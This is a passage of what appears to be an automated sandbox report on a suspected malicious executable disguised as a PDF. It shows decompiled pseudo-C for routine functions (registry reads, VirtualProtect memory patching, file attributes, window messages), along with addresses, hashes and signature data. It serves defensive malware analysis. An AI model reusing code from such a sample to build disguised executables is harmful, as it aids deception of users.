				_t11 = RegOpenKeyExW(E00402D48( *_t3), _t8, 0,  *0x42a2f0 | _a4,  &_a4); // executed
				asm("sbb eax, eax");
				return  !( ~_t11) & _a4;
			}






                                                                      0x00402d71
                                                                      0x00402d77
                                                                      0x00402d7c
                                                                      0x00402d85
                                                                      0x00402d8d
                                                                      0x00402d95

                                                                      APIs
                                                                      • RegOpenKeyExW.KERNELBASE(00000000,00000444,00000000,00000022,00000000,?,?), ref: 00402D85
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: Open
                                                                      • String ID:
                                                                      • API String ID: 71445658-0
                                                                      • Opcode ID: 2cb17219caef5c2c057f25c6a0d5a563c17eea178cedf0001938d6a474f7be63
                                                                      • Instruction ID: 508f16f0b04c5eadc0d806ad76faca1178dd72643dd16b9b94500f6ee76514f5
                                                                      • Opcode Fuzzy Hash: 2cb17219caef5c2c057f25c6a0d5a563c17eea178cedf0001938d6a474f7be63
                                                                      • Instruction Fuzzy Hash: 12E04F76280108ABDB00EFA4EE46ED537DCAB14740F008021B608D70A1C674E5509768
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 100027C7 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x10004048 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x1000405c, 4, 0x40, 0x1000404c); // executed
					 *0x1000405c = 0xc2;
					 *0x1000404c = 0;
					 *0x10004054 = 0;
					 *0x10004068 = 0;
					 *0x10004058 = 0;
					 *0x10004050 = 0;
					 *0x10004060 = 0;
					 *0x1000405e = 0;
				}
				return 1;
			}



                                                                      0x100027d0
                                                                      0x100027d5
                                                                      0x100027e5
                                                                      0x100027ed
                                                                      0x100027f4
                                                                      0x100027f9
                                                                      0x100027fe
                                                                      0x10002803
                                                                      0x10002808
                                                                      0x1000280d
                                                                      0x10002812
                                                                      0x10002812
                                                                      0x1000281a

                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167633537010.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000002.00000002.167633501084.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167633578927.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167633608441.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_10000000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                      • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                                                      • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                      • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040234E Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E0040234E(short __ebx) {
				short _t7;
				WCHAR* _t8;
				WCHAR* _t19;
				void* _t21;
				void* _t24;

				_t7 =  *0x40a010; // 0xa
				 *(_t21 + 8) = _t7;
				_t8 = E00402C53("true");
				 *(_t21 - 0x50) = E00402C53(0x12);
				GetPrivateProfileStringW(_t8,  *(_t21 - 0x50), _t21 + 8, _t19, 0x3ff, E00402C53(0xffffffdd)); // executed
				_t24 =  *_t19 - 0xa;
				if(_t24 == 0) {
					 *((intOrPtr*)(_t21 - 4)) = 1;
					 *_t19 = __ebx;
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}








                                                                      0x0040234e
                                                                      0x00402355
                                                                      0x00402358
                                                                      0x00402368
                                                                      0x0040237f
                                                                      0x00402385
                                                                      0x00401751
                                                                      0x0040286f
                                                                      0x00402876
                                                                      0x00402876
                                                                      0x00402ade
                                                                      0x00402aea

                                                                      APIs
                                                                      • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040237F
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: PrivateProfileString
                                                                      • String ID:
                                                                      • API String ID: 1096422788-0
                                                                      • Opcode ID: a0c645cdae85ff89f3910aa28bd6119042b2c01797eb2224224bfadf122582d4
                                                                      • Instruction ID: dd75bc0ae23c3a1c44a4da6173f6571f456224c800c03a06d022cc4bf2e9b606
                                                                      • Opcode Fuzzy Hash: a0c645cdae85ff89f3910aa28bd6119042b2c01797eb2224224bfadf122582d4
                                                                      • Instruction Fuzzy Hash: C2E04F30804259AAEB00BFE0DE09AED3B68AF00384F10443AF640AB0D1E7F8C5829749
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E004015A3() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesW(E00402C53(0xfffffff0),  *(_t11 - 0x24)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}






                                                                      0x004015ae
                                                                      0x004015b4
                                                                      0x004015b6
                                                                      0x004028a1
                                                                      0x004028a1
                                                                      0x00402ade
                                                                      0x00402aea

                                                                      APIs
                                                                      • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: 6075ec5d70de62ac054e246d743b0af4d3b11f1716ce8b7c98ea541af288864c
                                                                      • Instruction ID: c23ad3d9d814670b9e5664e680d4ed6fd6c27bb1f69e79231988cb8a8a550e85
                                                                      • Opcode Fuzzy Hash: 6075ec5d70de62ac054e246d743b0af4d3b11f1716ce8b7c98ea541af288864c
                                                                      • Instruction Fuzzy Hash: CCD01232704104D7DB10DBA4AB4869D73A1EB40369B218577D602F21D0D6B9CA919B29
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00404322 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00404322(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x429218;
				if(_t2 != 0) {
					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}





                                                                      0x00404322
                                                                      0x00404329
                                                                      0x00404334
                                                                      0x00000000
                                                                      0x00404334
                                                                      0x0040433a

                                                                      APIs
                                                                      • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404334
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: c2a25a807fea80bd58a61b321fa2af33aa5b35e52655131f61520799e32131e4
                                                                      • Instruction ID: 8a3813f545c22c4fb684de807d70b5cf20617c54f99984af9f55df869fa0abe2
                                                                      • Opcode Fuzzy Hash: c2a25a807fea80bd58a61b321fa2af33aa5b35e52655131f61520799e32131e4
                                                                      • Instruction Fuzzy Hash: B2C09B71740700BBDA20DF649D45F5777547764701F1488797741F60E0C674D410D62C
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00403402 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00403402(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                                      0x00403410
                                                                      0x00403416

                                                                      APIs
                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403100,?), ref: 00403410
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: FilePointer
                                                                      • String ID:
                                                                      • API String ID: 973152223-0
                                                                      • Opcode ID: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                                                                      • Instruction ID: 64c0fffafe8abe290eaf2022e63b776f1a4a3bd25e2fde741040b5855636c72c
                                                                      • Opcode Fuzzy Hash: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                                                                      • Instruction Fuzzy Hash: 70B01231140300BFDA214F00DF09F057B21AB90700F10C034B344780F086711075EB0D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040430B Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E0040430B(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x42a248, 0x28, _a4, "true"); // executed
				return _t2;
			}




                                                                      0x00404319
                                                                      0x0040431f

                                                                      APIs
                                                                      • SendMessageW.USER32(00000028,?,?,00404137), ref: 00404319
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: 7bbf2f5232cd2574a5b007ccbcd78797cc8e3f4bb2dd07224d7ba7f17a9ad77c
                                                                      • Instruction ID: 3e0bacd84e958153637e663f6e0df00a268db6e73930f78988907d41dcf2010e
                                                                      • Opcode Fuzzy Hash: 7bbf2f5232cd2574a5b007ccbcd78797cc8e3f4bb2dd07224d7ba7f17a9ad77c
                                                                      • Instruction Fuzzy Hash: 32B01235290A00FBDE214B00EE09F457E62F76C701F008478B340240F0CAB300B1DB19
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004042F8 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E004042F8(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x423724, _a4); // executed
				return _t2;
			}




                                                                      0x00404302
                                                                      0x00404308

                                                                      APIs
                                                                      • KiUserCallbackDispatcher.NTDLL(?,004040D0), ref: 00404302
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: CallbackDispatcherUser
                                                                      • String ID:
                                                                      • API String ID: 2492992576-0
                                                                      • Opcode ID: 8a62e99fe4a67b047fdc914663d327e58adf51456459288db10dd5d3044e9a2e
                                                                      • Instruction ID: ea629541fdd2228df96855dc4de4e407fdbb002a66502a1a5a86269346c048a7
                                                                      • Opcode Fuzzy Hash: 8a62e99fe4a67b047fdc914663d327e58adf51456459288db10dd5d3044e9a2e
                                                                      • Instruction Fuzzy Hash: C0A001B6644500ABCE129F90EF49D0ABBB2EBE8742B518579A285900348A364961EB59
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E004014D7(intOrPtr __edx) {
				long _t3;
				void* _t7;
				intOrPtr _t10;
				void* _t13;

				_t10 = __edx;
				_t3 = E00402C31(_t7);
				 *((intOrPtr*)(_t13 - 0x50)) = _t10;
				if(_t3 <= 1) {
					_t3 = 1;
				}
				Sleep(_t3); // executed
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t13 - 4));
				return 0;
			}







                                                                      0x004014d7
                                                                      0x004014d8
                                                                      0x004014e1
                                                                      0x004014e4
                                                                      0x004014e8
                                                                      0x004014e8
                                                                      0x004014ea
                                                                      0x00402ade
                                                                      0x00402aea

                                                                      APIs
                                                                      • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: 8556d933aa03095f5ae29ad39e6b5f38acab29bdc3a44382b1018c57526023e9
                                                                      • Instruction ID: 8e321c80e88a1319f2525a3d5ae6c8193a45d3eb8196d3f8087198c45f82dbda
                                                                      • Opcode Fuzzy Hash: 8556d933aa03095f5ae29ad39e6b5f38acab29bdc3a44382b1018c57526023e9
                                                                      • Instruction Fuzzy Hash: 05D05E73B141048BD720DBB8BE8585E73A8EB403193218837D402E1191E6B8C8524628
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 1000101B Relevance: 1.3, APIs: 1, Instructions: 13memoryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 16%
                                                                      			E1000101B(signed int _a4) {
				signed int _t2;
				void* _t4;

				_t2 = E10001516();
				if(_t2 != 0) {
					_t4 = GlobalAlloc(0x40, _t2 * _a4); // executed
					_push(_t4);
				} else {
					_push(_t2);
				}
				return E1000153D();
			}





                                                                      0x1000101b
                                                                      0x10001022
                                                                      0x1000102f
                                                                      0x10001035
                                                                      0x10001024
                                                                      0x10001024
                                                                      0x10001024
                                                                      0x1000103c

                                                                      APIs
                                                                      • GlobalAlloc.KERNELBASE(00000040,?,10001019,?), ref: 1000102F
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167633537010.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000002.00000002.167633501084.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167633578927.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167633608441.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_10000000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: AllocGlobal
                                                                      • String ID:
                                                                      • API String ID: 3761449716-0
                                                                      • Opcode ID: e75efe14272d739486d1db974dc6e9717b1eaf87509b7cdf2a82d93b2c2872d6
                                                                      • Instruction ID: e5c3751ad1220250e74be9454f066420c3e0eb8c37b3bb25f91e25635540fedc
                                                                      • Opcode Fuzzy Hash: e75efe14272d739486d1db974dc6e9717b1eaf87509b7cdf2a82d93b2c2872d6
                                                                      • Instruction Fuzzy Hash: 29C08CA5001282F9F110C3B08D0AF9F22ACCB881D2F104400FA93C908CDAB0D7801630
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 1000121B Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E1000121B() {
				void* _t3;

				_t3 = GlobalAlloc(0x40,  *0x1000406c +  *0x1000406c); // executed
				return _t3;
			}




                                                                      0x10001225
                                                                      0x1000122b

                                                                      APIs
                                                                      • GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167633537010.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000002.00000002.167633501084.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167633578927.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167633608441.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_10000000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: AllocGlobal
                                                                      • String ID:
                                                                      • API String ID: 3761449716-0
                                                                      • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                      • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                                                      • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                      • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Function 00404CED Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 96%
                                                                      			E00404CED(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed char* _v28;
				long _v32;
				signed int _v40;
				long _v44;
				signed int* _v56;
				signed char* _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t192;
				intOrPtr _t195;
				long _t201;
				signed int _t205;
				signed int _t216;
				void* _t219;
				void* _t220;
				int _t226;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t239;
				signed int _t241;
				signed char _t242;
				signed char _t248;
				void* _t252;
				void* _t254;
				signed char* _t270;
				signed char _t271;
				long _t276;
				int _t282;
				signed int _t283;
				long _t284;
				signed int _t287;
				signed int _t294;
				signed char* _t302;
				struct HWND__* _t306;
				int _t307;
				signed int* _t308;
				int _t309;
				long _t310;
				signed int _t311;
				void* _t313;
				long _t314;
				int _t315;
				signed int _t316;
				void* _t318;

				_t306 = _a4;
				_v12 = GetDlgItem(_t306, 0x3f9);
				_v8 = GetDlgItem(_t306, 0x408);
				_t318 = SendMessageW;
				_v20 =  *0x42a268;
				_t282 = 0;
				_v24 =  *0x42a250 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t285 = _a16;
					} else {
						_a12 = _t282;
						_t285 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t285;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
							if(( *0x42a259 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t282) {
									_t231 = _v16;
									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, _t282,  *(_t231 + 0x5c));
									}
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe39) {
										_t285 = _v20;
										_t233 =  *(_t232 + 0x5c);
										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
